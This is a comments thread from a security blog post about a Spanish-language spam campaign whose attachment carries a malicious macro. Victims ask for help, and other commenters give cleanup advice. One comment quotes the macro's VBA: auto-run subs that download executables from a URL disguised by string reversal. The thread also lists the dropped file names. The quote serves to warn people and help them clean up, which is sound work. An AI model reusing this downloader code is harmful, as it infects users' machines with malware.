tag:blogger.com,1999:blog-804714437673009003.post9031261855298610704..comments2024-02-23T09:06:13.967+00:00Comments on Dynamoo's Blog: "Notificación de transferencia de fondos a su favor" spamUnknownnoreply@blogger.comBlogger8125tag:blogger.com,1999:blog-804714437673009003.post-38131382360997060862014-07-18T00:57:26.324+01:002014-07-18T00:57:26.324+01:00@Conrad Longmore I looks like the macro security w...@Conrad Longmore I looks like the macro security was disabled. Just noted my pc opens IE on startup. I did what Cesar Alejandro Amezcua Tejeda said.<br /><br />btw <br /><br />Gracias @Cesar Alejandro Amezcua Tejeda, en caso de encontrar algo más en el escaneo lo escribiré por aquí. (In any case I find something else in the scan, I'll put it here)José Alfredo Medellín Navarrohttps://www.blogger.com/profile/04021802264339201407noreply@blogger.comtag:blogger.com,1999:blog-804714437673009003.post-67919889290794024072014-07-17T22:05:54.469+01:002014-07-17T22:05:54.469+01:00@Cosas extrañamente normales: I think opening it i...@Cosas extrañamente normales: I think opening it is harmless unless you have disabled the Macro security.Conrad Longmorehttps://www.blogger.com/profile/11751822299235747323noreply@blogger.comtag:blogger.com,1999:blog-804714437673009003.post-16262865817111736312014-07-17T19:15:11.448+01:002014-07-17T19:15:11.448+01:00This comment has been removed by the author.Cesar Amezcuahttps://www.blogger.com/profile/11446983393630696475noreply@blogger.comtag:blogger.com,1999:blog-804714437673009003.post-48222152174144058232014-07-17T19:15:09.629+01:002014-07-17T19:15:09.629+01:00Posiblemente por lo que entiendo se descarga en la...Posiblemente por lo que entiendo se descarga en la carpeta Temp en mi caso es<br /><br />C:\Users\[usuario]\AppData\Local\Temp<br /><br />Sería buscar en esa carpeta los archivos <br /><br />4b646n46.exe<br />rsd54tgs.exe<br />ds8fydsa89f7.exe<br />fsfsfsdsd.exe<br />hjhhjhjhjhj.exe<br /><br />y si es así eliminarlos y aplicar un escaneo al equipo.<br />Cesar Amezcuahttps://www.blogger.com/profile/11446983393630696475noreply@blogger.comtag:blogger.com,1999:blog-804714437673009003.post-52484030994442060432014-07-17T19:01:45.193+01:002014-07-17T19:01:45.193+01:00Este es el código que se ejecuta tengan cuidado, ...Este es el código que se ejecuta tengan cuidado, VBA, como dice el post te descarga archivos a tu equipo <br /><br />Private Sub Auto_Open()<br />Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "4b646n46.exe")<br />End Sub<br />Private Sub Workbook_Open()<br />Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "rsd54tgs.exe")<br />Cesar Amezcuahttps://www.blogger.com/profile/11446983393630696475noreply@blogger.comtag:blogger.com,1999:blog-804714437673009003.post-82288715907476091102014-07-17T18:10:32.135+01:002014-07-17T18:10:32.135+01:00Hola como se que no estoy contagiado con algun vir...Hola como se que no estoy contagiado con algun virus yo lo abri tambien por accidenteOtras Aventurashttps://www.blogger.com/profile/09189236377139296727noreply@blogger.comtag:blogger.com,1999:blog-804714437673009003.post-80688162897482604842014-07-17T16:33:35.482+01:002014-07-17T16:33:35.482+01:00Thank you so much, I received this same email yest...Thank you so much, I received this same email yesterday, had no idea what to do until I saw the properties and saw the "modified by "clein"", so I started looking for that name and found your blog. My sister opened the document and activated the macros yesterday, I don't know what to do, the pc isn't behaving suspiciously at all. What should I do? Greetings from MéxicoJosé Alfredo Medellín Navarrohttps://www.blogger.com/profile/04021802264339201407noreply@blogger.comtag:blogger.com,1999:blog-804714437673009003.post-85939216129531074892014-07-17T16:24:40.213+01:002014-07-17T16:24:40.213+01:00This comment has been removed by the author.José Alfredo Medellín Navarrohttps://www.blogger.com/profile/04021802264339201407noreply@blogger.com